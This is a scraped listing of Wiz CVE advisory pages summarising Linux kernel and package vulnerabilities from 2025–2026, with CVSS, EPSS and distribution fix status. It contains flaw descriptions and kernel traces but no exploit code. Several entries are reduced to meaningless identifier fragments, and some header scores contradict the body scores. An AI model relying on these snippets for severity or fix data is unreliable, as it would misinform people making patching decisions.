CVE-2025-68263 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-68263 [CRITICAL] CVE-2025-68263 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68263 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: ipc: fix use-after-free in ipc_msg_send_request
ipc_msg_send_request() waits for a generic netlink reply using an
ipc_msg_table_entry on the stack. The generic netlink handler
(handle_generic_event()/handle_response()) fills entry->response under
ipc_msg_table_lock, but ipc_msg_send_request() used to validate and free
entry->response without holding the same lock.
Under high concurrency this allows a race where handle_response() is
copying data into entry->response while ipc_msg_send_request() has just
freed it, leading to a slab-use-after-free reported by KASAN in
handle_generic_event():
BUG: KASAN: slab-use-after-free in handle_generic_ev
Wiz
CVE-2026-23323 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-23323 [MEDIUM] CVE-2026-23323 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23323 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
hwmon: (macsmc) Fix regressions in Apple Silicon SMC hwmon driver
The recently added macsmc-hwmon driver contained several critical
bugs in its sensor population logic and float conversion routines.
Specifically:
The voltage sensor population loop used the wrong prefix ("volt-"
instead of "voltage-") and incorrectly assigned sensors to the
temperature sensor array (hwmon->temp.sensors) instead of the
voltage sensor array (hwmon->volt.sensors). This would lead to
out-of-bounds memory access or data corruption when both temperature
and voltage sensors were present.
The float conversion in macsmc_hwmon_write_f32() had flawed exponent logic for value
Wiz
CVE-2025-71140 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2025-71140 [MEDIUM] CVE-2025-71140 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71140 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
media: mediatek: vcodec: Use spinlock for context list protection lock
Previously a mutex was added to protect the encoder and decoder context
lists from unexpected changes originating from the SCP IP block, causing
the context pointer to go invalid, resulting in a NULL pointer
dereference in the IPI handler.
Turns out on the MT8173, the VPU IPI handler is called from hard IRQ
context. This causes a big warning from the scheduler. This was first
reported downstream on the ChromeOS kernels, but is also reproducible
on mainline using Fluster with the FFmpeg v4l2m2m decoders. Even though
the actual capture format is not supported, the affected code pa
Wiz
CVE-2026-23294 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.0
CVE-2026-23294 [HIGH] CVE-2026-23294 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23294 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix race in devmap on PREEMPT_RT
On PREEMPT_RT kernels, the per-CPU xdp_dev_bulk_queue (bq) can be
accessed concurrently by multiple preemptible tasks on the same CPU.
The original code assumes bq_enqueue() and __dev_flush() run atomically
with respect to each other on the same CPU, relying on
local_bh_disable() to prevent preemption. However, on PREEMPT_RT,
local_bh_disable() only calls migrate_disable() (when
PREEMPT_RT_NEEDS_BH_LOCK is not set) and does not disable
preemption, which allows CFS scheduling to preempt a task during
bq_xmit_all(), enabling another task on the same CPU to enter
bq_enqueue() and operate on the same per-CPU bq con
Wiz
CVE-2025-71105 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2025-71105 [MEDIUM] CVE-2025-71105 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71105 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: use global inline_xattr_slab instead of per-sb slab cache
As Hong Yun reported in mailing list:
loop7: detected capacity change from 0 to 131072
------------[ cut here ]------------
kmem_cache of name 'f2fs_xattr_entry-7:7' already exists
WARNING: CPU: 0 PID: 24426 at mm/slab_common.c:110 kmem_cache_sanity_check mm/slab_common.c:109 [inline]
WARNING: CPU: 0 PID: 24426 at mm/slab_common.c:110 __kmem_cache_create_args+0xa6/0x320 mm/slab_common.c:307
CPU: 0 UID: 0 PID: 24426 Comm: syz.7.1370 Not tainted 6.17.0-rc4 #1 PREEMPT(full)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
RIP: 0010:kmem_cache_sanity
Wiz
CVE-2026-24030 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-24030 [MEDIUM] CVE-2026-24030 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24030 :
Linux Debian vulnerability analysis and mitigation
An attacker might be able to trick DNSdist into allocating too much memory while processing DNS over QUIC or DNS over HTTP/3 payloads, resulting in a denial of service. In setups with a large quantity of memory available this usually results in an exception and the QUIC connection is properly closed, but in some cases the system might enter an out-of-memory state instead and terminate the process.
Source : NVD
## 5.3
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.9
Exploitation Probability (EPSS) N/A
Affected p
Wiz
CVE-2026-31405 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-31405 [MEDIUM] CVE-2026-31405 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31405 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
media: dvb-net: fix OOB access in ULE extension header tables
The ule_mandatory_ext_handlers[] and ule_optional_ext_handlers[] tables
in handle_one_ule_extension() are declared with 255 elements (valid
indices 0-254), but the index htype is derived from network-controlled
data as (ule_sndu_type & 0x00FF), giving a range of 0-255. When
htype equals 255, an out-of-bounds read occurs on the function pointer
table, and the OOB value may be called as a function pointer.
Add a bounds check on htype against the array size before either table
is accessed. Out-of-range values now cause the SNDU to be discarded.
Source : NVD
Published April 6, 2026
CNA Sc
Wiz
CVE-2025-71139 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2025-71139 [MEDIUM] CVE-2025-71139 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71139 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
kernel/kexec: fix IMA when allocation happens in CMA area
*** Bug description ***
When I tested kexec with the latest kernel, I ran into the following warning:
[ 40.712410] ------------[ cut here ]------------
[ 40.712576] WARNING: CPU: 2 PID: 1562 at kernel/kexec_core.c:1001 kimage_map_segment+0x144/0x198
[...]
[ 40.816047] Call trace:
[ 40.818498] kimage_map_segment+0x144/0x198 (P)
[ 40.823221] ima_kexec_post_load+0x58/0xc0
[ 40.827246] __do_sys_kexec_file_load+0x29c/0x368
[...]
[ 40.855423] ---[ end trace 0000000000000000 ]---
*** How to reproduce ***
This bug is only triggered when the kexec target address is allocated in
the CMA area. If no
Wiz
CVE-2026-0846 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-0846 [HIGH] CVE-2026-0846 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0846 :
Linux Debian vulnerability analysis and mitigation
filestring()
nltk.util
Source : NVD
## 8.6
Score
Published March 9, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 27.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
nltk
Sources
NVD
Debian 11 Severity HIGH No Fix Added at: Mar 10, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 10, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 10, 2026
Echo Severity HIGH No Fix Added at: Mar 10, 2026
Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04, 25.10 Severity MEDIUM No Fix Added at: Mar 26, 2026
## Get a C
Wiz
CVE-2025-14933 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-14933 [HIGH] CVE-2025-14933 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14933 :
Linux Debian vulnerability analysis and mitigation
NSF Unidata NetCDF-C NC Variable Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the parsing of NC variables. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27266.
Source : NVD
## 7.8
Score
Published December 23, 2025
Severi
Wiz
CVE-2026-23432 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23432 [MEDIUM] CVE-2026-23432 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23432 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
mshv: Fix use-after-free in mshv_map_user_memory error path
In the error path of mshv_map_user_memory(), calling vfree() directly on
the region leaves the MMU notifier registered. When userspace later unmaps
the memory, the notifier fires and accesses the freed region, causing a
use-after-free and potential kernel panic.
Replace vfree() with mshv_partition_put() to properly unregister
the MMU notifier before freeing the region.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabi
Wiz
CVE-2026-35093 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-35093 [HIGH] CVE-2026-35093 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35093 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in libinput. A local attacker who can place a specially crafted Lua bytecode file in certain system or user configuration directories can bypass security restrictions. This allows the attacker to run unauthorized code with the same permissions as the program using libinput, such as a graphical compositor. This could lead to the attacker monitoring keyboard input and sending that information to an external location.
Source : NVD
## 8.8
Score
Published April 1, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4
Exploitat
Wiz
CVE-2026-23309 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23309 [MEDIUM] CVE-2026-23309 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23309 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
tracing: Add NULL pointer check to trigger_data_free()
If trigger_data_alloc() fails and returns NULL, event_hist_trigger_parse()
jumps to the out_free error path. While kfree() safely handles a NULL
pointer, trigger_data_free() does not. This causes a NULL pointer
dereference in trigger_data_free() when evaluating
data->cmd_ops->set_filter.
Fix the problem by adding a NULL pointer check to trigger_data_free().
The problem was found by an experimental code review agent based on
gemini-3.1-pro while reviewing backports into v6.18.y.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
H
Wiz
CVE-2025-40352 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2025-40352 [MEDIUM] CVE-2025-40352 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40352 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
platform/mellanox: mlxbf-pmc: add sysfs_attr_init() to count_clock init
The lock-related debug logic (CONFIG_LOCK_STAT) in the kernel is noting
the following warning when the BlueField-3 SOC is booted:
BUG: key ffff00008a3402a8 has not been registered!
------------[ cut here ]------------
DEBUG_LOCKS_WARN_ON(1)
WARNING: CPU: 4 PID: 592 at kernel/locking/lockdep.c:4801 lockdep_init_map_type+0x1d4/0x2a0 Call trace:
lockdep_init_map_type+0x1d4/0x2a0
__kernfs_create_file+0x84/0x140
sysfs_add_file_mode_ns+0xcc/0x1cc
internal_create_group+0x110/0x3d4
internal_create_groups.part.0+0x54/0xcc
sysfs_create_groups+0x24/0x40
device_add+0x6e8/0x93c
device_regis
Wiz
CVE-2014-125112 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2014-125112 [CRITICAL] CVE-2014-125112 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2014-125112 :
Linux Debian vulnerability analysis and mitigation
Plack::Middleware::Session::Cookie versions through 0.21 for Perl allows remote code execution.
Plack::Middleware::Session::Cookie versions through 0.21 has a security vulnerability where it allows an attacker to execute arbitrary code on the server during deserialization of the cookie data, when there is no secret used to sign the cookie.
Source : NVD
## 9.8
Score
Published March 26, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 30.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
libplack-middleware-session-per
Wiz
CVE-2026-3888 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3888 [MEDIUM] CVE-2026-3888 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3888 :
Linux Debian vulnerability analysis and mitigation
Local privilege escalation in snapd on Linux allows local attackers to get root privilege by re-creating snap's private /tmp directory when systemd-tmpfiles is configured to automatically clean up this directory. This issue affects Ubuntu 16.04 LTS, 18.04 LTS, 20.04 LTS, 22.04 LTS, and 24.04 LTS.
Source : NVD
## 7.8
Score
Published March 17, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
snapd
Sources
NVD
Debian 11, 14 Severity HIGH No Fix Added at: Mar 17,
Wiz
CVE-2026-5315 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5315 [MEDIUM] CVE-2026-5315 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5315 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was determined in Nothings stb up to 1.26. The affected element is the function stbtt__buf_get8 in the library stb_truetype.h of the component TTF File Handler. Executing a manipulation can lead to out-of-bounds read. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.3
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.6
Exploitation Probability (EPSS)
Wiz
CVE-2025-71102 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2025-71102 [MEDIUM] CVE-2025-71102 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71102 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
scs: fix a wrong parameter in __scs_magic
__scs_magic() needs a 'void *' variable, but a 'struct task_struct *' is
given. 'task_scs(tsk)' is the starting address of the task's shadow call
stack, and '__scs_magic(task_scs(tsk))' is the end address of the task's
shadow call stack. Here should be '__scs_magic(task_scs(tsk))'.
The user-visible effect of this bug is that when CONFIG_DEBUG_STACK_USAGE
is enabled, the shadow call stack usage checking function
(scs_check_usage) would scan an incorrect memory range. This could lead
Inaccurate stack usage reporting : The function would calculate
wrong usage statistics for the shadow call stack, potentially
Wiz
CVE-2023-54182 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2023-54182 CVE-2023-54182 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54182 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to check readonly condition correctly
With below case, it can mount multi-device image w/ rw option, however
one of secondary device is set as ro, later update will cause panic, so
let's introduce f2fs_dev_is_readonly(), and check multi-devices rw status
in f2fs_remount() w/ it in order to avoid such inconsistent mount status.
mkfs.f2fs -c /dev/zram1 /dev/zram0 -f
blockdev --setro /dev/zram1
mount -t f2fs dev/zram0 /mnt/f2fs
mount: /mnt/f2fs: WARNING: source write-protected, mounted read-only.
mount -t f2fs -o remount,rw mnt/f2fs
dd if=/dev/zero of=/mnt/f2fs/file bs=1M count=8192
kernel BUG at fs/f2fs/inline.c:258!
RIP: 0010:f2fs_write_i
Wiz
CVE-2025-71244 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2025-71244 [MEDIUM] CVE-2025-71244 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71244 :
Linux Debian vulnerability analysis and mitigation
SPIP before 4.4.5 and 4.3.9 allows an Open Redirect via the login form when used in AJAX mode. An attacker can craft a malicious URL that, when visited by a victim, redirects them to an arbitrary external site after login. This vulnerability only affects sites where the login page has been overridden to function in AJAX mode. It is not mitigated by the SPIP security screen.
Source : NVD
## 5.1
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
Wiz
CVE-2026-4751 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4751 [MEDIUM] CVE-2026-4751 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4751 :
Linux Debian vulnerability analysis and mitigation
NULL Pointer Dereference vulnerability in tmate-io tmate.This issue affects tmate: before 2.4.0.
Source : NVD
## 5.3
Score
Published March 24, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
tmate
Sources
NVD
Debian 11, 12, 13, 14 Severity LOW No Fix Added at: Mar 24, 2026
Echo Severity MEDIUM No Fix Added at: Mar 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
#
Wiz
CVE-2025-12474 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.3
CVE-2025-12474 [LOW] CVE-2025-12474 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-12474 :
Linux Debian vulnerability analysis and mitigation
A specially-crafted file can cause libjxl's decoder to read pixel data from uninitialized (but allocated) memory.
This can be done by causing the decoder to reference an outside-image-bound area in a subsequent patches. An incorrect optimization causes the decoder to omit populating those areas.
Source : NVD
## 2.3
Score
Published February 11, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
firefox-debuginfo
libjxl-devtools-debuginfo
Sources
NVD
Debian 12,
Wiz
CVE-2026-3608 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3608 [MEDIUM] CVE-2026-3608 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3608 :
Linux Debian vulnerability analysis and mitigation
Sending a maliciously crafted message to the kea-ctrl-agent, kea-dhcp-ddns, kea-dhcp4, or kea-dhcp6 daemons over any configured API socket or HA listener can cause the receiving daemon to exit with a stack overflow error.
This issue affects Kea versions 2.6.0 through 2.6.4 and 3.0.0 through 3.0.2.
Source : NVD
## 7.5
Score
Published March 25, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libkea-asiodns62
libkea-cc83
Sources
NVD
Debian 12, 13 Severity HIGH
Wiz
CVE-2023-54250 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54250 [MEDIUM] CVE-2023-54250 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54250 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: avoid out of bounds access in decode_preauth_ctxt()
Confirm that the accessed pneg_ctxt->HashAlgorithms address sits within
the SMB request boundary; deassemble_neg_contexts() only checks that the
eight byte smb2_neg_context header + (client controlled) DataLength are
within the packet boundary, which is insufficient.
Checking for sizeof(struct smb2_preauth_neg_context) is overkill given
that the type currently assumes SMB311_SALT_SIZE bytes of trailing Salt.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2025-68314 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68314 [MEDIUM] CVE-2025-68314 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68314 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/msm: make sure last_fence is always updated
Update last_fence in the vm-bind path instead of kernel managed path.
last_fence is used to wait for work to finish in vm_bind contexts but not
used for kernel managed contexts.
This fixes a bug where last_fence is not waited on context close leading
to faults as resources are freed while in use.
Patchwork: https://patchwork.freedesktop.org/patch/680080/
Source : NVD
Published December 16, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS
Wiz
CVE-2025-6591 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-6591 [MEDIUM] CVE-2025-6591 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-6591 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/api/ApiFeedContributions.Php.
This issue affects MediaWiki: from * before 1.39.13, 1.42.7 1.43.2, 1.44.0.
Source : NVD
Published February 2, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM Has Fix Added at: Jul 03, 2025
Debian 14 Severity MEDIUM Has Fix Added at: Aug 10, 2025
Echo Severity MEDIUM Has Fix A
Wiz
CVE-2025-67482 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.7
CVE-2025-67482 [LOW] CVE-2025-67482 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67482 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation Scribunto, Wikimedia Foundation luasandbox. This vulnerability is associated with program files includes/Engines/LuaCommon/lualib/mwInit.Lua, library.C.
This issue affects Scribunto: from * before 1.39.16, 1.43.6, 1.44.3, 1.45.1; luasandbox: from * before fea2304f8f6ab30314369a612f4f5b165e68e95a.
Source : NVD
## 1.7
Score
Published February 3, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13
Wiz
CVE-2025-66046 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-66046 [CRITICAL] CVE-2025-66046 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66046 :
Linux Debian vulnerability analysis and mitigation
Several stack-based buffer overflow vulnerabilities exists in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities.When Tag is 67
Source : NVD
## 9.8
Score
Published December 11, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 12, 2
Wiz
CVE-2026-23051 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23051 [MEDIUM] CVE-2026-23051 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23051 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: fix drm panic null pointer when driver not support atomic
When driver not support atomic, fb using plane->fb rather than
plane->state->fb.
(cherry picked from commit 2f2a72de673513247cd6fae14e53f6c40c5841ef)
Source : NVD
Published February 4, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-azure
linux-azure-fde-6.17
Sources
NVD
Debian 14 Has Fix Added at: Feb 04, 2026
Ubuntu 16.04, 18.04,
Wiz
CVE-2025-69209 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2025-69209 [MEDIUM] CVE-2025-69209 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69209 :
Linux Debian vulnerability analysis and mitigation
decimalPlaces
dtostrf
## Patches
1.8.7
The Fixing Commit is available at the following link 1a6a417f89c8901dad646efce74ae9d3ddebfd59
## References
ASEC-26-001 ArduinoCore-avr vXXXX Resolves Buffer Overflow Vulnerability
## Credits
Maxime Rossi Bellom and Ramtine Tofighi Shirazi from SecMate ( https://secmate.dev/ )
Source : NVD
## 6.9
Score
Published January 21, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
arduino-core-avr
Sources
NVD
Debian 11, 1
Wiz
CVE-2026-3994 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3994 [MEDIUM] CVE-2026-3994 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3994 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was detected in rui314 mold up to 2.40.4. This issue affects the function mold::ObjectFilemold::X86_64::initialize_sections of the file src/input-files.cc of the component Object File Handler. Performing a manipulation results in heap-based buffer overflow. Attacking locally is a requirement. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published March 12, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Wiz
CVE-2026-3099 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
CVE-2026-3099 [MEDIUM] CVE-2026-3099 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3099 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in Libsoup. The server-side digest authentication implementation in the SoupAuthDomainDigest class does not properly track issued nonces or enforce the required incrementing nonce-count (nc) attribute. This vulnerability allows a remote attacker to capture a single valid authentication header and replay it repeatedly. Consequently, the attacker can bypass authentication and gain unauthorized access to protected resources, impersonating the legitimate user.
Source : NVD
## 7.3
Score
Published March 12, 2026
Severity HIGH
CNA Score 5.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation
Wiz
CVE-2025-64438 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.7
CVE-2025-64438 [LOW] CVE-2025-64438 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-64438 :
Linux Debian vulnerability analysis and mitigation
gapList .base - gapStart
StatefulReader::processGapMsg()
WriterProxy::changes_received_
std::set
Source : NVD
## 1.7
Score
Published February 3, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fastdds
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Nov 19, 2025
